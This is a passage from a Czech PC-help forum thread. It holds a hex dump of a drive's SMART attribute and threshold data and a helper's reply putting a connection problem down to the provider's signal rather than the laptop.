0B0: 00 00 00 00 00 00 C5 32 00 64 64 00 00 00 00 00
0C0: 00 00 C6 30 00 64 64 00 00 00 00 00 00 00 C7 32
0D0: 00 C8 C8 00 00 00 00 00 00 00 DC 02 00 64 64 23
0E0: 10 00 00 00 00 00 DE 32 00 64 64 26 00 00 00 00
0F0: 00 00 DF 32 00 64 64 00 00 00 00 00 00 00 E0 22
100: 00 64 64 00 00 00 00 00 00 00 E2 26 00 64 64 1E
110: 01 00 00 00 00 00 F0 01 00 64 64 00 00 00 00 00
120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
160: 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 5B
170: 03 00 01 00 02 C5 00 00 00 00 00 00 00 00 00 00
180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41

-- SMART_READ_THRESHOLD ----------------------------------------------------
+0 +1 +2 +3 +4 +5 +6 +7 +8 +9 +A +B +C +D +E +F
000: 10 00 01 32 00 00 00 00 00 00 00 00 00 00 02 32
010: 00 00 00 00 00 00 00 00 00 00 03 01 00 00 00 00
020: 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00
030: 00 00 05 32 00 00 00 00 00 00 00 00 00 00 07 32
040: 00 00 00 00 00 00 00 00 00 00 08 32 00 00 00 00
050: 00 00 00 00 00 00 09 00 00 00 00 00 00 00 00 00
060: 00 00 0A 1E 00 00 00 00 00 00 00 00 00 00 0C 00
070: 00 00 00 00 00 00 00 00 00 00 BF 00 00 00 00 00
080: 00 00 00 00 00 00 C0 00 00 00 00 00 00 00 00 00
090: 00 00 C1 00 00 00 00 00 00 00 00 00 00 00 C2 00
0A0: 00 00 00 00 00 00 00 00 00 00 C4 00 00 00 00 00
0B0: 00 00 00 00 00 00 C5 00 00 00 00 00 00 00 00 00
0C0: 00 00 C6 00 00 00 00 00 00 00 00 00 00 00 C7 00
0D0: 00 00 00 00 00 00 00 00 00 00 DC 00 00 00 00 00
0E0: 00 00 00 00 00 00 DE 00 00 00 00 00 00 00 00 00
0F0: 00 00 DF 00 00 00 00 00 00 00 00 00 00 00 E0 00
100: 00 00 00 00 00 00 00 00 00 00 E2 00 00 00 00 00
110: 00 00 00 00 00 00 F0 01 00 00 00 00 00 00 00 00
120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36

Příspěvekod **jaro3** » 11 zář 2012 10:20

Pokud si se s ním jinde připojila dobře , tak problém není v NB..
Chyba bude u poskytovatele v signálu.

Pokud nejsou jiné problémy , je to vše a můžeš dát vyřešeno , zelenou fajfku.

Prosim o kontrolu pc Vyřešeno

Prosim o kontrolu pc

Re: Prosim o kontrolu pc

Re: Prosim o kontrolu pc

Re: Prosim o kontrolu pc

Re: Prosim o kontrolu pc

Re: Prosim o kontrolu pc

Re: Prosim o kontrolu pc

Re: Prosim o kontrolu pc

Re: Prosim o kontrolu pc

Re: Prosim o kontrolu pc

Re: Prosim o kontrolu pc

Re: Prosim o kontrolu pc

Kdo je online